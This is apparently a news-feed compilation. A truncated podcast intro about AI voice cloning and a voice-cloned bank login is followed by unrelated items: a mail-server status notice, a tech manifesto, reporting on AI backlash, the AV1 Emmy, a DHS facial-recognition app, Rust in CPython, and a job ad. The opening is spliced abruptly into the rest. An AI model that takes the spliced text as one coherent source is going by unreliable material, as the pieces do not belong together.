JOSEPH: Today I’m speaking at the Digital Vulnerabilities in the Age of AI Summit (DIVAS) (good name) on a panel about the financial risks of AI. The way I see it, that applies to the scams that are being powered by AI.

As soon as a new technology is launched, I typically think of ways it might be abused. Sometimes I cover this, sometimes not, but the thought always crosses my mind. One example that did lead to coverage was back at Motherboard in 2023 with an article called How I Broke Into a Bank Account With an AI-Generated Voice.

At the time, ElevenLabs had just launched. The company focuses on AI audio and voice cloning. Basically, you upload audio (originally that could be of anyone, before ElevenLabs introduced some guardrails) and the company then lets you ‘say’ anything as that voice. I spoke to voice actors at the time who were obviously very concerned.


Shingles vaccination prevented or delayed dementia

Hacker News
www.cell.com
2025-12-05 17:47:16
Comments...

bulk email delivery problems to outlook/hotmail/microsoft

May First Status Updates
status.mayfirst.org
2025-12-05 17:42:13
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Servers Affected/Servidores afectados: Mail relay servers Period Affected/Horas afectadas: 2025-12-01 - Date/Fecha: 2025-12-05 We are currently experiencing a higher than normal number of bounces when sending bulk email to Microsoft email servers (i...
Original Article

Welcome to the May First Movement Technology Status Page

Please see below for any known interruptions to our service. If you are experiencing a problem not listed here, please open a support ticket.

Subscribe to an RSS feed of these alerts, get them by email , or learn how to subscribe to other messages .

Return to mayfirst.coop

bulk email delivery problems to outlook/hotmail/microsoft

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Servers Affected/Servidores afectados: Mail relay servers
Period Affected/Horas afectadas: 2025-12-01 -
Date/Fecha: 2025-12-05

We are currently experiencing a higher than normal number of bounces when
sending bulk email to Microsoft email servers (including outlook.com, hotmail.com and
others).

This does not affect individual email.

We are working on it.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEH5wwyzz8XamYf6A1oBTAWmB7dTUFAmkzX8UACgkQoBTAWmB7
dTXDFhAAn++09egH7+yChrO5FQNjN2BcMP9pdHv4vsfCM+HOEGga/soc3OY3ZDdb
jULRZKh5tV/rnWgsTIce2+JWoO3yjjnSGrqEY/qODP+2+JQeawbjgf1DlTf/LXC9
S0zDJS8YAgsvpZoMhD0eRJ22KG3MAtc2m7NPAzEScfUSv7t/ntJKNjCJ8WROYtee
Ox5MWXeApMe1C4LLfEpcOL21O8zJcbJaf/MyMaZBUt+8GefB6kbT64r0RDQgK0ec
6SuLnnjnrgas7pm9tW4ybWSbh68IupZij7lBmBXtosjh8cJL6m3RXR6akL2BumSe
1wLCjuW8PhU0E41lT3KmvQ7PP6ikxKbZ95G7Qf211YLTb+Vn+dskiTH9gAzlScZk
03zVHb2FtmDU37AohZ3coMOv8qsg7zJw7y8faiXAE6UP3fX9H9g0S7KpsUyq93q1
3sSDvp1Tfv2DrOI/63QTLzn68oPb44rzHwqPThqEoXBLfZ1q3A5gLU+cGcvEjq1A
Wkw3/n2mwZhfcy0YQjFGy/YhWVszxSJCscakKkCm4TbbYYgB+CXIu6k5r2o02yE/
Mu6J2br0rvR+7ahK8c8mi1jLga1pH9VvPJQYaAZWf+MZfegRvBRF6e24F3Tj7ccs
wgNfOVc1dmBMsx9EQ3g6TrGgu6trw58DMFYR+SzKbDTNjmBUwXY=
=pSac
-----END PGP SIGNATURE-----
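To check the signature yourself, the standard OpenPGP workflow applies (assuming you have fetched May First’s published public key; the filenames below are illustrative):

# Import their published key, then verify the clearsigned message:
gpg --import mayfirst-public-key.asc
gpg --verify status-message.txt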

The Resonant Computing Manifesto

Lobsters
resonantcomputing.org
2025-12-05 17:34:24
Comments...
Original Article

We shape our environments, and thereafter they shape us.

Great technology does more than solve problems. It weaves itself into the world we inhabit. At its best, it can expand our capacity, our connectedness, our sense of what's possible. Technology can bring out the best in us.

Our current technological landscape, however, does the opposite. Feeds engineered to hijack attention and keep us scrolling, leaving a trail of anxiety and atomization in their wake. Digital platforms that increasingly mediate our access to transportation, work, food, dating, commerce, entertainment—while routinely draining the depth and warmth from everything they touch. For all its grandiose promises, modern tech often leaves us feeling alienated, ever more distant from who we want to be.

The people who build these products aren't bad or evil. Most of us got into tech with an earnest desire to leave the world better than we found it. But the incentives and cultural norms of the tech industry have coalesced around the logic of hyper-scale. It's become monolithic, magnetic, all-encompassing—an environment that shapes all who step foot there. While the business results are undeniable, so too are the downstream effects on humanity.

With the emergence of artificial intelligence, we stand at a crossroads. This technology holds genuine promise. It could just as easily pour gasoline on existing problems. If we continue to sleepwalk down the path of hyper-scale and centralization, future generations are sure to inherit a world far more dystopian than our own.

But there is another path opening before us.


Christopher Alexander spent his career exploring why some built environments deaden us, while others leave us feeling more human, more at home in the world. His work centered around the "quality without a name," this intuitive knowing that a place or an architectural element is in tune with life. By learning to recognize this quality, he argued, and constructing a building in dialogue with it, we could reliably create environments that enliven us.

We call this quality resonance . It's the experience of encountering something that speaks to our deeper values. It's a spark of recognition, a sense that we're being invited to lean in, to participate. Unlike the digital junk food of the day, the more we engage with what resonates, the more we're left feeling nourished, grateful, alive. As individuals, following the breadcrumbs of resonance helps us build meaningful lives. As communities, companies, and societies, cultivating shared resonance helps us break away from perverse incentives, and play positive-sum infinite games together.

For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.

This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations. We can build resonant environments that bring out the best in every human who inhabits them.


And so, we find ourselves at this crossroads. Regardless of which path we choose, the future of computing will be hyper-personalized. The question is whether that personalization will be in service of keeping us passively glued to screens—wading around in the shallows, stripped of agency—or whether it will enable us to direct more attention to what matters.

In order to build the resonant technological future we want for ourselves, we will have to resist the seductive logic of hyper-scale, and challenge the business and cultural assumptions that hold it in place. We will have to make deliberate decisions that stand in the face of accepted best practices—rethinking the system architectures, design patterns, and business models that have undergirded the tech industry for decades.

We suggest these five principles as a starting place:

  1. Private: In the era of AI, whoever controls the context holds the power. While data often involves multiple stakeholders, people must serve as primary stewards of their own context, determining how it's used.
  2. Dedicated: Software should work exclusively for you, ensuring contextual integrity where data use aligns with your expectations. You must be able to trust there are no hidden agendas or conflicting interests.
  3. Plural: No single entity should control the digital spaces we inhabit. Healthy ecosystems require distributed power, interoperability, and meaningful choice for participants.
  4. Adaptable: Software should be open-ended, able to meet the specific, context-dependent needs of each person who uses it.
  5. Prosocial: Technology should enable connection and coordination, helping us become better neighbors, collaborators, and stewards of shared spaces, both online and off.

We, the signatories of this manifesto, are committed to building, funding, and championing products and companies that embed these principles at their core. For us, this isn't a theoretical treatise. We're already building tooling and infrastructure that will enable resonant products and ecosystems.

But we cannot do it alone. None of us holds all the answers, and this movement cannot succeed in isolation. That's why, alongside this manifesto, we're sharing an evolving list of principles and theses. These are specific assertions about the implementation details and tradeoffs required to make resonant computing a reality. Some of these stem from our experiences, while others will be crowdsourced from practitioners across the industry. This conversation is only just beginning.

If this vision resonates, we invite you to join us. Not just as a signatory, but as a contributor. Add your expertise, your critiques, your own theses. By harnessing the collective intelligence of people who earnestly care, we can chart a path towards technology that enables individual growth and collective flourishing.

Sign the manifesto

Explore & contribute to the theses of resonant computing


Contributors

The following individuals drafted and released this manifesto:

Maggie Appleton
Samuel Arbesman
Daniel Barcay
Rob Hardy
Aishwarya Khanduja
Alex Komoroske
Geoffrey Litt
Michael Masnick
Brendan McCord

Bernhard Seefeld
Ivan Vendrov
Amelia Wattenberger
Zoe Weinberg
Simon Willison

with illustrations by
Forest Stearns

Signatories

The following individuals have signed in support:

Tim O'Reilly

Kevin Kelly

Bruce Schneier

Hiten Shah

Eric Ries

Joel Lehman

Packy McCormick

Danielle Perszyk

Jim Rutt

Peter Wang

Brad Burnham

Kent Beck

Eugene Wei

Gary William Flake

Lenny Rachitsky

John Seely Brown

Roy Bahat

Jonathan Zittrain

Max Read

Harper Reed

Lawrence Lessig

Evan Henshaw-Plath

Anjan Katta

Yancey Strickler

Uri Bram

Rohit Krishnan

Simon Taylor

David A Smith

Peter van Hardenberg

E. Glen Weyl

Linda Liukas

Adam Davidson

Mark A. Lemley

Matt Beane

Chad Kohalyk

James Edward Dillard

Ben mathes

Goblin Oats

Chris Lunt

Curran Dwyer

Ben Follington

Stuart Buck

Bridget Harris

Chad Fowler

Kyle Morris

Sean Thielen-Esparza

Janfj

Yatú Espinosa

Alex Zhang

Anna Mitchell

Steve Kirkham

Scott Moore

Jason Zhao

Jad Esber

Joel Dietz

Lola Agabalogun

Tony Espinoza

Arjun Khoosal

Tony Curzon Price

Maximilian Eusterbrock

Beth Anderson

Anastasia Uglova

Jordan Erlends

Samuel Robson

Andrew Conner

Menno Schaap

Philipp Banhardt

Berlynn Bai

Arun

Louis Barclay

Gabriel Raubenheimer

Roman Leventov

Corey James

Ben Mayhew

Kyle Cox

Pierre Chuzeville

Lucabrando Sanfilippo

Jai Gandhi

Carsten Peters

Raghuvir Kasturi

B. Scot Rousse

Ilan Strauss

Yash Sharma

Sean McKeon

Gurupanguji

Zoë Chazen

John Luther

Blain Smith

Menelaos Mazarakis

Konstantinos Komaitis

Eddy Abraham

Justin Mares

Aastha JS

Marisa Rama

Seb Agertoft

Christina Kirsch

Peter Voss

Shoumik Dabir

Mike McCormick

Riley Wong

Matt Hawes

Michele Canzi

Matt Jones

Jonathan Lebensold

Francisco Javier Arceo

Noah Ringler

Simone Cicero

Lex Sokolin

Erika Rice Scherpelz

Sahar Mor

max bittker

Avni Patel Thompson

Chaim Gingold

Matt Ziegler

Daniel Hatkoff

Kamran Hakima

Rupert Manfredi

Mark Moriarty

Jordan Rubin

Rebecca Mqamelo

Chenoe Hart

Rob Flickenger

Michael Lapadula

Dan Garon

Sean Lynch

Michael Tanzillo

Reggie James

Sam Barton

Anthea Roberts

Andrew Rose

Kevin Roark

Matt Holden

Leon Markham

Sam Weston

Rudolf Laine

Mark Whiting

Christine Gibson

Vivian Chong

Florian Weber

Luke Chatelain

Dan Bornstein (@danfuzz)

Marcus Estes

Kasra Kyanzadeh

Rishi Ishairzay

Nicholas Chirls

Lola Wajskop

William Kelly

Michael Greig

Jasnam Sidhu

dougfort

Lev Eliezer Israel

Mathilde Grant

Nathaniel Evans

Jessica Johnston

Benoit Pimpaud

Ross Matican

Natalie Breitkopf

Nirit Weiss-Blatt

James Sinka

Grace Kantrow

Robinson Eaton

Tom Rielly

Jason Shellen

EdZ

Juan Suarez

Selipso

Toto Tvalavadze

Brian "Beej Jorgensen" Hall

Hiraeth Wax

Dave Sanford

Rida Al Barazi

Baba Buehler

Will Henderson

Johannes Ernst

Gernot Poetsch

Ian Mulvany

Xavi Duran

Steve Della Valentina

Gabriel Cubbage

Marcel Goethals

Ashish Uppala

Ted Wood

Al Mithani

Carlos Pinto

Joël Gombin

Jassi Singh

Patrick Farrell

Steven Feuerstein

Alexia Petrakos

Quentin Hardy

Daniel Müller

Jorge Arango

Tom Usher

Jake Simonds

Luke Hubbard

Oren Maximov

Arun krishnasamy

Kingsley Uyi Idehen

Christopher David

mig

Giedrius Jaloveckas

Yuval Yeret

Mario Zechner

Alex Reynish

William Philpott

Sireesh Gururaja

Stephen Band

Peergos

Joey Tyson

Ankesh Bharti

Tommy Falkowski

Ruthvik Reddy SL

Raymond Zhong

Ramin Firoozye

Jeff Smith

David M. Schulman

Scott Rosenberg


Changelog

Substantive changes that have been made to this manifesto:

11/18/25 - Changed several instances of the word “user” to “people” or other humanistic alternatives. The word user carries heavy connotations of addiction.

10/28/25 - Updated the first principle (private) to include more nuanced language around the ownership of data. People must be the primary stewards of their context, but every system has multiple stakeholders.

10/28/25 - Updated the second principle (dedicated) to include the "contextual integrity" privacy model.

10/27/25 - Added header artwork and poetic introduction.

The AI Backlash Is Here: Why Public Patience with Tech Giants Is Running Out

Hacker News
www.newsweek.com
2025-12-05 17:29:47
Comments...
Original Article

On OpenAI’s new social app, Sora 2, a popular video shows a disturbingly lifelike Sam Altman sprinting out of a Target store with stolen computer chips, begging police not to take his “precious technology.” The clip is absurdist, a parody of the company’s own CEO, but it also speaks to a larger conversation playing out in dinner conversations, group chats and public spaces around the country: What, exactly, is this technology for?

From ads scrawled with graffiti to online comment sections filled with mockery, the public’s patience with AI-generated media is starting to wear thin. Whether it’s YouTube comments deriding synthetic ad campaigns or complaints scribbled in Sharpie across New York City subway posters for AI startups, the public’s discontent with the AI boom is growing louder.

What began in 2022 as broad optimism about the power of generative AI to make people’s lives easier has shifted toward deep cynicism: the technology heralded as a game changer is, in fact, only changing the game for the richest technologists in Silicon Valley, who are benefiting from a seemingly endless supply of money to build AI projects, many of which don’t appear to solve any actual problems. Three years ago, as OpenAI’s ChatGPT was making its splashy debut, a Pew Research Center survey found that nearly one in five Americans saw AI as a benefit rather than a threat. By 2025, 43 percent of U.S. adults believed AI is more likely to harm them than help them in the future, according to Pew.


Slop as a Service

As AI spreads, public skepticism is turning into open hostility toward its products and ads. Campaigns made with generative AI are mocked online and vandalized in public. Friend, a startup that spent $1 million on a sprawling campaign in the New York City subway with more than 11,000 advertisements on subway cars, 1,000 platform posters, and 130 urban panels, has been hit especially hard. Most of its ads were defaced with graffiti calling the product “surveillance capitalism” and urging people to “get real friends.”

"AI doesn't care if you live or die," reads one tag on a Friend ad in Brooklyn.

Other brands like Skechers are seeing similar backlash for an AI-generated campaign showing a distorted woman in sneakers, dismissed as lazy and unprofessional. Many of the Skechers subway posters were quickly defaced — some tagged with “slop,” the memeified shorthand for AI’s cheap, joyless flood of content, now embodied by the Altman deepfakes flooding Sora.

“The idea of authenticity has long been at the center of the social media promise, for audiences and content creators alike. But a lot of AI-generated content is not following that logic,” said Natalia Stanusch, a researcher at AI Forensics, a nonprofit that investigates the impact of artificial intelligence on digital ecosystems.

“With this flood of content made using generative AI, there is a threat of social media becoming less social, and users are noticing this trend,” she told Newsweek.

'Wildly Oversold'

In an era when the digital and physical worlds are becoming nearly indistinguishable, one thing is increasingly clear: skepticism toward generative artificial intelligence is rising on both sides of the political divide. What once held the promise of innovation in the arts—an AI that could generate art, compose music or write coherent, even beautiful, prose—has begun to feel more like saturation.

The friction isn’t just about quality—it’s about what the ubiquity of these tools signals. In entertainment, backlash has mounted as high-profile artists find themselves cloned without consent. After an AI-generated song mimicking his voice went viral on TikTok, rapper Bad Bunny lashed out on WhatsApp, telling his 19 million followers that, if they enjoyed the track, “you don’t deserve to be my friends.” Similar complaints came from Drake and The Weeknd, whose own AI replicas were pulled from streaming platforms after public outcry.

“The public is finally starting to catch on,” said Gary Marcus, a professor emeritus at NYU and one of the field’s most vocal critics. “Generative AI itself may be a fad and certainly has been wildly oversold.”

That saturation, according to Marcus and others, has less to do with AI’s breakthroughs and more to do with the way companies have stripped out human labor under the guise of innovation. It's a shift that has turned into backlash—one fueled not only by developers and ethicists but by cultural figures, creators and the general public.

Alex Hanna, director of research at the Distributed AI Research Institute (DAIR) and co-author of The A.I. Con: How to Fight Big Tech’s Hype and Create the Future We Want—a critique of large language models (LLMs), the technology behind AI systems like ChatGPT and Sora—told Newsweek that public opinion is increasingly aligning with his criticism.

“We’re seeing this narrative that AI is this inevitable future and it's being used to shut down questions about whether people actually want these tools or benefit from them,” Hanna said. “It becomes an excuse to displace workers, to automate without accountability, and with serious questions about its impact on the environment.”

“Companies want to make it look like AI is magic,” Hanna added. “But behind that magic is a labor force, data that’s been extracted without consent and an entire system built on exploitation.”

One telling example: Meta’s recent launch of Vibes, a TikTok-style video app featuring only AI-generated content, was met with widespread mockery. “No one asked for this,” one viral post read. Stanusch, of AI Forensics, agreed: “For the near future, we don’t expect this adoption to slow down but rather increase,” she said.

Even as capital flows into AI infrastructure buildouts, the cultural effect of so much "slop" is creating its own language of resistance. The term “clanker”—borrowed from Star Wars and repurposed by Gen Z—has exploded in popularity on TikTok as a meme-slur for robots and AI systems replacing human jobs. The term, while satirical, reflects deeper anxieties about labor displacement, particularly among younger workers entering an economy being transformed by AI.

Still, some see a long-term upside. “The robots are coming, and they’re coming for everyone’s jobs,” said Adam Dorr, director of research at RethinkX, in an interview with Newsweek. “But in the longer term, AI could take over the dangerous, miserable jobs we’ve never wanted to do.”

Dorr, like others, urges caution—not rejection. “The challenge is: how do we make this transformation safely?” he said. “People are right to be scared. We’re already on the train—and the destination may be great but the journey will be chaotic.”

The Bubble Threat

From mental health chatbots and short-form video apps to corporate ad campaigns and toilet cameras that can analyze feces, AI is everywhere, and billions of dollars are still pouring in.

But saturation breeds doubt: what might look like cutting-edge innovation to investors is starting to look like a bubble to everyone else.

In just the first half of 2025, global investment in AI infrastructure topped $320 billion, with $225 billion coming from U.S. hyperscalers and sovereign-backed funds, according to IDC. Microsoft alone committed over $50 billion to data center expansion this year. Meta, Amazon, OpenAI and others are backing the $500 billion Stargate AI initiative — championed by the Trump administration.

Since returning to office, Donald Trump has made AI central to his economic agenda, fast-tracking permitting for AI infrastructure and declaring in a recent speech: “We will win the AI race just like we did the space race.”


But many experts are unconvinced the numbers add up. “AI spending outpacing current real economic returns is not a problem—that’s what many innovative technologies call for,” Andrew Odlyzko, professor emeritus at the University of Minnesota, told Newsweek. “The problem is that current (and especially projected) AI spending appears to be outpacing plausible future real economic returns.”

Odlyzko warned that much of the sector is propped up by “circular investment patterns,” in which AI companies fund one another without enough real customer demand. In one such example, Nvidia recently said it would invest $100 billion in OpenAI to help it build massive data centers, essentially backstopping its own customer. “If there was a big rush of regular non-AI companies paying a lot for AI services, that would be different," Odlyzko said. "But there is no sign of it.”

Other experts like British technology entrepreneur Azeem Azhar have compared the current capex boom to past busts. “The trillions pouring into servers and power lines may be essential,” he wrote on his Substack, “but history suggests they are not where enduring profits accumulate.”

And while lawsuits over AI training data have begun piling up—including one filed by The New York Times against OpenAI—others center on how generative tools imitate distinct styles. A viral 2025 trend saw ChatGPT produce Studio Ghibli-style images so convincingly that it appeared the beloved Japanese animation studio had endorsed the platform. They had not.

In the meantime, so far, AI remains deeply unprofitable at scale. Last month, the consulting firm Bain predicted the AI industry would need to be making $2 trillion in combined annual revenues by 2030 to meet expected data center demand — a shortfall of roughly $800 billion.

“There is a lack of deep value,” the tech columnist and AI critic Ed Zitron told Newsweek. “The model is unsustainable.” And yet, with billions of dollars and the weight of national policy behind it, even skeptics agree: if and when the AI bubble bursts, its impact will ripple far beyond Silicon Valley.

When a video codec wins an Emmy

Lobsters
blog.mozilla.org
2025-12-05 17:12:29
Comments...
Original Article

It’s not every day a video codec wins an Emmy. But yesterday, the Television Academy honored the AV1 specification with a Technology & Engineering Emmy Award , recognizing its impact on how the world delivers video content.

Gold Emmy-style statuette in front of green illuminated panels at an award ceremony podium.
The AV1 specification was honored with a Technology & Engineering Emmy Award on Dec. 4, 2025.

The web needed a new video codec

Through the mid-2010s, video codecs were an invisible tax on the web, built on a closed licensing system with expensive, unpredictable fees. Most videos online relied on the H.264 codec, which open-source projects like Firefox could only support without paying MPEG LA license fees thanks to Cisco’s open-source OpenH264 module.

Especially as demand for video grew, the web needed a next-generation codec to make high-quality streaming faster and more reliable. H.265 promised efficiency gains, but there was no guarantee of another OpenH264-style arrangement. The risk was another fragmented ecosystem where browsers like Firefox couldn’t play large portions of the web’s video.

Enter AV1

To solve this, Mozilla joined other technical leaders to form the Alliance for Open Media (AOM) in 2015 and started ambitious work on a next-generation codec built from Google’s VP9, Mozilla’s Daala, and Cisco’s Thor.

The result was AV1, released in 2018, which delivered top-tier compression as an open standard under a royalty-free patent policy. It’s now widely deployed across the streaming ecosystem, including hardware decoders and optimized software decoders that allow open-source browsers like Firefox to provide state-of-the-art video compression to all users across the web.

AV1 is also the foundation for the image format AVIF, which is deployed across browsers and provides excellent compression for still and animated images (AVIF is based on a video codec, after all).

The Emmy award reflects the value of open standards, open-source software, and the sustained work by AOM participants and the broader community fighting for an open web.

Looking ahead to AV2

AV1 fixed a structural problem in the ecosystem at the time, but the work isn’t finished. Video demand keeps rising, and the next generation of open codecs must remain competitive.

AOMedia is working on the upcoming release of AV2. It will feature meaningfully better compression than AV1, much higher efficiency for screen/graphical content, alpha channel support, and more.

As AV2 arrives, our goal remains unchanged: make video on the web open, efficient, and accessible to everyone.

DHS’s Immigrant-Hunting App Removed from Google Play Store

404 Media
www.404media.co
2025-12-05 17:05:47
The app, called Mobile Identify, was launched in November, and lets local cops use facial recognition to hunt immigrants on behalf of ICE. It is unclear if the removal is temporary or not....
Original Article

A Customs and Border Protection (CBP) app that lets local cops use facial recognition to hunt immigrants on behalf of the federal government has been removed from the Google Play Store, 404 Media has learned.

It is unclear whether the removal is temporary, what the exact reason for it was, or whether Google or CBP removed the app. Neither Google nor CBP immediately responded to a request for comment. Its removal comes after 404 Media documented multiple instances of CBP and ICE officials using their own facial recognition app to identify people and verify their immigration status, including people who said they were U.S. citizens.

The removal also comes after “hundreds” of Google employees took issue with the app, according to a source with knowledge of the situation.

“Google's a very big place, and most people at the company haven't heard anything about this, yet hundreds signaled their displeasure with the app approval, either directly in the internal report about the app, or in memes about it,” the source said. 404 Media granted multiple sources in this story anonymity to protect them from retaliation.


“We're sorry, the requested URL was not found on this server,” the app’s Play Store page says at the time of writing.

CBP launched the app, called Mobile Identify, in November. It lets a police officer point their smartphone camera at a person and perform a face scan; the app then tells the officer whether their agency should contact ICE about the person. The app is designed “to identify and process individuals who may be in the country unlawfully,” according to the app’s Play Store page before it was removed.

As 404 Media reported at the time of the app’s launch, the Play Store page itself makes no mention of facial recognition. But 404 Media downloaded a copy of the app, decompiled its code, and found clear references to scanning faces, such as a package called “facescanner.”

A source with knowledge of the app previously told 404 Media the app doesn’t return names after a face search. Instead it tells users to contact ICE and provides a reference number, or to not detain the person depending on the result.

The app is specifically for local and state agencies that are part of the 287(g) program, in which ICE delegates certain immigration-related powers to local and state agencies. Members of the 287(g) Task Force Model (TFM) are allowed to enforce immigration law during their ordinary police duties, which “essentially turns police officers into ICE agents,” according to the New York Civil Liberties Union.

Google previously told 404 Media in a statement: “This app is only usable with an official government login and does not publicly broadcast specific user data or location. Play has robust policies and when we find a violation, we take action.” Critics saw a disconnect in Google hosting a CBP app for hunting immigrants while removing apps that let local communities report sightings of ICE officials. Google previously described ICE officials as a vulnerable group in need of protection.

Mobile Identify is essentially a watered-down version of Mobile Fortify, a more powerful facial recognition app CBP and ICE are using in the field. That app, based on leaked emails and other material obtained by 404 Media, uses CBP systems usually reserved for identifying travelers entering the U.S., and turns that technology inwards. It queries a database of more than 200 million images when an ICE official scans a subject’s face, according to the material. It then returns a subject’s name, date of birth, “alien number,” and whether they’ve been given an order of deportation. That app is not publicly available, and instead can only be downloaded onto DHS-issued work devices.

An internal DHS document 404 Media obtained said ICE does not let people decline to be scanned by the app.

Before it was removed, the app had been downloaded more than a hundred times, according to 404 Media’s earlier review of the Play Store page.


Eventual Rust in CPython

Lobsters
lwn.net
2025-12-05 17:05:27
Comments...
Original Article

Emma Smith and Kirill Podoprigora, two of Python's core developers, have opened a discussion about including Rust code in CPython, the reference implementation of the Python programming language. Initially, Rust would only be used for optional extension modules, but they would like to see Rust become a required dependency over time. The initial plan was to make Rust required by 2028, but Smith and Podoprigora indefinitely postponed that goal in response to concerns raised in the discussion.

The proposal

The timeline given in their pre-PEP called for Python 3.15 (expected in October 2026) to add a warning to Python's configure script if Rust is not available when Python is built. Any uses of Rust would be strictly optional at that point, so the build wouldn't fail if it is missing. At this stage, Rust would be used in the implementation of the standard library, in order to implement native versions of Python modules that are important to the performance of Python applications, such as base64. Example code to accomplish this was included in the proposal. In 3.16, the configure script would fail if Rust is missing unless users explicitly provide the "--with-rust=no" flag. In 3.17 (expected in 2028), Python could begin strictly requiring Rust at build time — although it would not be required at run time, for users who get their Python installation in binary form.

Besides Rust's appeal as a solution to memory-safety problems, Smith cited that there are an increasing number of third-party Python extensions written in Rust as a reason to bring the proposal forward. Perhaps, if Rust code could be included directly in the CPython repository, the project would attract more contributors interested in bringing their extensions into the standard library, she said. The example in the pre-PEP was the base64 module, but she expressed hope that many areas of the standard library could see improvement. She also highlighted the Rust for Linux project as an example of this kind of integration going well.


Cornelius Krupp was apprehensive; he thought that the Rust-for-Linux project was more of a cautionary tale, given the public disagreements between maintainers. Those disagreements have settled down over time, and the kernel community is currently integrating Rust with reasonable tranquility, but the Rust for Linux project still reminds many people of how intense disagreements over programming languages can get in an established software project. Jacopo Abramo had the same worry, but thought that the Python community might weather that kind of disagreement better than the kernel community has. Smith agreed with Abramo, saying that she expected the experience to be “altogether different” for Python.

Steve Dower had a different reason to oppose the proposal: he wasn't against the Rust part, but he was against adding additional optional modules to Python's core code. In his view, optional extensions should really live in a separate repository. Da Woods called out that the proposal wouldn't bring any new features or capabilities to Python. Smith replied (in the same message linked above) that the goal was to eventually introduce Rust into the core of Python, in a controlled way. So, the proposal wasn't only about enabling extension modules. That didn't satisfy Dower, however. He said that his experience with Rust, mixed-language code, and teams forced him to disapprove of the entire proposal. Several other community members agreed with his disapproval for reasons of their own.

Chris Angelico expressed concern that Rust might be more susceptible to a "trusting trust" attack (where a compiler is invisibly subverted to introduce targeted backdoors) than C, since right now Rust only has one usable compiler. Sergey Davidoff linked to the mrustc project, which can be used to show that the Rust compiler (rustc) is free of such attacks by comparing the artifacts produced from rustc and mrustc. Dower agreed that Rust didn't pose any more security risk than C, but also wasn't sure how it would provide any security benefits, given that CPython is full of low-level C code that any Rust code will need to interoperate with. Aria Desires pointed to the recent Android Security post about the adoption of Rust as evidence that mixed code bases adopting Rust do end up with fewer security vulnerabilities.

Not everyone was against the proposal, however. Alex Gaynor and James Webber both spoke up in favor. Guido van Rossum also approved, calling the proposal a great development and saying that he trusted Smith and others to guide the discussion.

Stephan Sokolow pointed out that many people were treating the discussion as being about “Rust vs. C”, but that in reality it might be “Rust vs. wear out and stop contributing”. Paul Moore thought that was an insightful point, and that the project should be willing to put in some work now in order to make contributing to the project easier in the future.

Nathan Goldbaum is a maintainer of the PyO3 project, which provides Rust bindings to the Python interpreter to support embedding Python in Rust applications and writing Python extensions in Rust. He said that having official Rust bindings would significantly reduce the amount of work he has to do to support new Python versions. Another PyO3 maintainer, David Hewitt, agreed, going on to suggest that perhaps CPython would benefit from looking at the API that PyO3 has developed over time and picking “the bits that work best”.

Raphael Gaschignard thought that the example Rust code Smith had provided would be a more compelling argument for adopting Rust if it demonstrated how using the language could simplify error handling and memory management compared to C code. Smith pointed out one such example, but concurred that the current proof-of-concept code wasn't a great demonstration of Rust's benefits in this area.

Gentoo developer Michał Górny said that the inclusion of Rust in CPython would be unfortunate for Gentoo, which supports many niche architectures that other distributions don't:

I do realize that these platforms are not "supported" by CPython right now. Nevertheless, even though there historically were efforts to block building on them, they currently work and require comparatively little maintenance effort to keep them working. Admittedly, the wider Python ecosystem with its Rust adoption puts quite a strain on us and the user experience worsens every few months, we still manage to provide a working setup.

[...]

That said, I do realize that we're basically obsolete and it's just a matter of time until some projects pulls the switch and force us to tell our users "sorry, we are no longer able to provide a working system for you".

Hewitt offered assistance with Górny's integration problems. “I build PyO3 [...] to empower more people to write software, not to alienate.” Górny appreciated the thought, but reiterated that the problem here was Rust itself and its platform support.

Scaling back

In response to the concerns raised in the discussion, Smith and Podoprigora scaled back the goals of the proposal, saying that it should be limited to using Rust for optional extension modules (i.e. speeding up parts of the standard library) for the foreseeable future. They still want to see Rust adopted in CPython's core eventually, but a more gradual approach should help address problems raised by bootstrapping, language portability, and related concerns that people raised in the thread, Smith said.

That struck some people as too conservative. Jelle Zijlstra said that if the proposal were limited to optional extension modules, it would bring complexity to the implementation of the standard library for a marginal benefit. Many people are excited about bringing Rust to CPython, Zijlstra said, but restricting Rust code to optional modules means putting Rust in the place that it will do the least good for the CPython code. Several other commenters agreed.

Smith pushed back, saying that moving to Rust was a long-term investment in the quality of the code, and that having a slow, conservative early period of the transition would help build out the knowledge and experience necessary to make the transition succeed. She later clarified that a lot of the benefit she saw from this deliberately careful proposal was doing the groundwork to make using Rust possible at all: sorting out the build-system integration, starting to gather feedback from users and maintainers, and prototyping what a native Rust API for Python could look like. All of that has to happen before it makes sense to consider Rust in the core code — so even though she eventually wants to reach that state, it makes sense to start here.

At the time of writing, the discussion is still ongoing. The Python community has not reached a firm conclusion about the adoption of Rust — but it has definitely ruled out a fast adoption. If Smith and Podoprigora's proposal moves forward, it still seems like it will be several years before Rust is adopted in CPython's core code, if it ever is. Still, the discussion also revealed a lot of enthusiasm for Rust — and that many people would rather contribute code written in Rust than attempt to wrestle with CPython's existing C code.




Onlook (YC W25) the Cursor for Designers Is Hiring a Founding Fullstack Engineer

Hacker News
news.ycombinator.com
2025-12-05 17:00:10
Comments...
Original Article

Hey HN! I'm Daniel, building Onlook, the Cursor for Designers. We built an open-source collaborative canvas for code that lets designers and developers craft incredible web experiences together.

Since launching, Onlook hit #1 on Hacker News, was the #1 trending repo on GitHub—above DeepSeek + Anthropic—and has earned over 23,000 GitHub stars. We’re looking to bring on Onlook’s first Founding Engineers.

This role requires autonomy - you’ll be setting standards for one of the fastest-growing open source projects backed by YC ever. You’ll help design and build an uncompromising visual IDE loved by tens of thousands of designers and engineers around the world, and you'll have a heavy influence on the direction of where we take the company.

You’re a full-stack engineer based in the U.S. who is ultra comfortable in TypeScript, NextJS, React, and Tailwind, and ready to jump in and build.

The most important things we look for:

• Olympic-level dedication – you want to be the best in the world at what you do.

• Ownership – you like autonomy and control over the destiny of the company.

• Speed – you’re comfortable shipping and iterating quickly with feedback.

• Craft – you’re opinionated and are willing to defend your opinions.

Ideally, you:

• Are looking for a fast-paced, early startup environment.

• Are willing to put in long hours and go the extra mile.

• Are comfortable with any part of the stack, front-end, back-end, or database.

• Believe in open source and are ok with your work being very public.

